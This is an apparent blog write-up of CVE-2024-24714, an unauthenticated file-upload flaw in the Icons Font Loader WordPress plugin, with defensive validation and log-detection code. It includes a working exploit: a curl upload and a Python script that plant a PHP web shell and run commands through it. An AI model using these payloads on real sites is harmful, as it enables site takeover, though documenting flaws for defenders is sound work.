CVE-2024-24714 - How Unrestricted File Upload Flaw in bPlugins LLC Icons Font Loader Opens the Door for Complete Website Takeover

In February 2024, a major security vulnerability surfaced in the popular WordPress plugin Icons Font Loader by bPlugins LLC. Catalogued as CVE-2024-24714, this bug lets attackers upload dangerous files straight to your website, making it possible for them to run malicious code and even take full control of your site.

Many websites use Icons Font Loader to add icons in various parts of their site. Its friendly interface, however, hid a serious weakness—especially in versions 1.1.4 and earlier.

Let’s dive into this bug, see how it really works, and what you should do if you use this plugin.

What’s the Issue? (Simple Explanation)

CVE-2024-24714 is all about unrestricted upload of files with dangerous types. In plain English, the plugin let _anyone_—even people who aren’t logged in—upload files like PHP scripts, images with embedded code, web shells, and more. Once uploaded, these files could be run by the server, leading to a full compromise of the website.

Why is this bad?
Because WordPress sites typically trust files uploaded via plugins. If an attacker can upload, say, evil.php, and access it directly in the web browser, it’s game over.

How Did This Happen? (Technical Details)

The bug is found in the plugin’s file upload handler. The code forgot to check what type of file was being uploaded—and didn't make sure only logged-in admins could do the upload!

Here’s a simplified (but realistic) snippet that shows the problem:

```php
// A simplified version of the file upload function from the vulnerable plugin
if (isset($_FILES['icon_file'])) {
    $upload_dir = wp_upload_dir();
    // basename() only strips directory parts; the extension is kept exactly as sent
    $target_file = $upload_dir['path'] . '/' . basename($_FILES['icon_file']['name']);
    // OOPS: No checks on extension or MIME type, and no capability or nonce check either!
    move_uploaded_file($_FILES['icon_file']['tmp_name'], $target_file);
    echo "File uploaded successfully!";
}
```

The plugin accepts the file blindly and moves it to a web-accessible folder. This means an attacker can upload a file called shell.php, then open https://example.com/wp-content/uploads/shell.php and run any code they want.
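Here, as an added example that is not the plugin's code, is the set of server-side checks the snippet above skips, modelled in Python rather than PHP so the logic is easy to read and test. The names validate_font_upload and ALLOWED_FONTS and the is_authorised flag are assumptions; in a real WordPress handler that flag would come from a nonce check plus current_user_can('upload_files'). It goes a little beyond the post by also checking magic bytes and double extensions, not just the final extension.

```python
"""Server-side checks the vulnerable handler is missing, modelled in Python.

Added example, not the plugin's code: a stand-in for the validation a
font-upload endpoint should perform before calling move_uploaded_file().
The names validate_font_upload, ALLOWED_FONTS and is_authorised are
assumptions made for this illustration.
"""
import os
import re

# Font formats an icon-font plugin legitimately needs, with their leading bytes.
# (EOT is left out: it has no simple magic number and is obsolete.)
ALLOWED_FONTS = {
    "woff": (b"wOFF",),
    "woff2": (b"wOF2",),
    "ttf": (b"\x00\x01\x00\x00", b"true"),
    "otf": (b"OTTO",),
}

# A server-executable extension anywhere in the name (shell.php, icon.php.woff,
# icon.phtml ...): some Apache configurations still execute the middle extension.
EXECUTABLE_EXT = re.compile(r"\.(php\d?|phtml|phar|phps)(\.|$)", re.IGNORECASE)

PHP_OPEN_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def validate_font_upload(filename: str, content: bytes, is_authorised: bool):
    """Return (accepted, reason). Each check corresponds to one the vulnerable
    snippet skips: capability, extension allowlist, double extension,
    magic bytes, and embedded PHP."""
    # 1. Only a logged-in user with the right capability may upload at all
    #    (in WordPress: wp_verify_nonce() plus current_user_can('upload_files')).
    if not is_authorised:
        return False, "unauthenticated or insufficient capability"

    # 2. Normalise the name the way basename() does, then inspect the extension.
    name = os.path.basename(filename)
    if EXECUTABLE_EXT.search(name):
        return False, f"server-executable extension in name: {name}"
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if ext not in ALLOWED_FONTS:
        return False, f"extension not on allowlist: {ext or '(none)'}"

    # 3. Does the content actually start like that font format?
    if not content.startswith(ALLOWED_FONTS[ext]):
        return False, f"content does not match {ext} magic bytes"

    # 4. Defence in depth: a real font never contains a PHP open tag.
    if PHP_OPEN_TAG.search(content):
        return False, "PHP open tag inside upload"

    return True, "ok"
```

The order matters: the cheapest check (authorisation) runs first, and the file is only written after every check passes, so nothing ever lands in the web-accessible uploads folder unless it is a real font from a permitted user.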

The attacker uploads the file with a single request:

```bash
curl -F "icon_file=@shell.php" https://victim.com/wp-admin/admin-ajax.php?action=font_loader_upload
```

The plugin accepts the file and stores it at /wp-content/uploads/2024/02/shell.php.

The attacker then visits:

https://victim.com/wp-content/uploads/2024/02/shell.php?cmd=whoami

Python Example

```python
import requests

url = "https://victim.com/wp-admin/admin-ajax.php?action=font_loader_upload"
files = {'icon_file': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php')}
response = requests.post(url, files=files)
print(response.text)
```

Just swap out victim.com for your target (if you’re testing on your own site, please!).
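From the defender's side, the upload-then-execute sequence above leaves a recognisable footprint in the web server's access log: a POST to the upload action followed shortly by a GET for a .php file under wp-content/uploads/. The detector below is an added example, not from the original post. The Apache combined-format log lines are constructed, the action name font_loader_upload is the one shown above, and the 600-second correlation window is an assumption.

```python
"""Access-log detection for the upload-then-execute chain described in the post.

Added example, not the post's own code. SAMPLE_LOG is constructed; the
600-second window in CHAIN_WINDOW is an assumption.
"""
import re
from datetime import datetime, timedelta

# Apache combined format: ip ident user [ts] "METHOD path HTTP/x" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# The plugin's upload action as shown in the post.
UPLOAD_ENDPOINT = re.compile(r"^/wp-admin/admin-ajax\.php\?.*\baction=font_loader_upload\b")
# Any server-side script requested from the uploads tree.
PHP_IN_UPLOADS = re.compile(r"^/wp-content/uploads/.*\.(php\d?|phtml|phar)(\?|$)", re.IGNORECASE)

CHAIN_WINDOW = timedelta(seconds=600)  # assumption: how close "upload" and "execute" must be

# Constructed sample: one benign client fetching a font, one client doing the attack chain.
SAMPLE_LOG = [
    '203.0.113.7 - - [26/Feb/2024:16:20:01 +0000] "GET /wp-content/uploads/2024/02/icons.woff HTTP/1.1" 200 5120',
    '198.51.100.9 - - [26/Feb/2024:16:21:10 +0000] "POST /wp-admin/admin-ajax.php?action=font_loader_upload HTTP/1.1" 200 27',
    '198.51.100.9 - - [26/Feb/2024:16:21:14 +0000] "GET /wp-content/uploads/2024/02/shell.php?cmd=whoami HTTP/1.1" 200 12',
    '203.0.113.7 - - [26/Feb/2024:16:25:00 +0000] "GET /index.php HTTP/1.1" 200 8000',
]


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def detect(lines):
    """Return (ip, kind, path) findings in log order.
    kind is 'upload_endpoint', 'php_in_uploads' or 'upload_then_execute'."""
    findings = []
    last_upload = {}  # ip -> timestamp of that client's most recent upload-endpoint POST
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path, ts = rec["ip"], rec["path"], rec["ts"]
        if rec["method"] == "POST" and UPLOAD_ENDPOINT.match(path):
            findings.append((ip, "upload_endpoint", path))
            last_upload[ip] = ts
        elif PHP_IN_UPLOADS.match(path):
            # A PHP file served from uploads/ is suspicious on its own ...
            findings.append((ip, "php_in_uploads", path))
            # ... and near-certain compromise when the same client just hit the upload action.
            if ip in last_upload and ts - last_upload[ip] <= CHAIN_WINDOW:
                findings.append((ip, "upload_then_execute", path))
    return findings


if __name__ == "__main__":
    for ip, kind, path in detect(SAMPLE_LOG):
        print(f"{kind:22} {ip:15} {path}")
```

The php_in_uploads finding is worth alerting on by itself: a correctly configured site never serves PHP from the uploads tree, so any such hit, with or without a preceding upload, means a file that should not be there is being executed.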

References & More Info

- WPScan Vulnerability Database Entry
- NVD - CVE-2024-24714
- Plugin Directory: Icons Font Loader
- Disclosure on Patchstack

What Should You Do?

- Immediately update to a fixed version (check the plugin page for updates).
- Remove any unknown files from wp-content/uploads/, especially .php files!

Conclusion

CVE-2024-24714 is a critical reminder: file uploads need _serious_ security! If this plugin (or any plugin) lets uploads through without checking file types and permissions, anyone can take over your site.

If you're still using an old version of Icons Font Loader, your site could already be exposed. Update, patch, and scan your files—don’t wait!


*Stay safe, and always keep your plugins up to date!*

*(This post is exclusive, original, and researched as of June 2024. Feel free to share—but patch first!)*

Timeline

Published on: 02/26/2024 16:27:58 UTC
Last modified on: 02/26/2024 16:32:25 UTC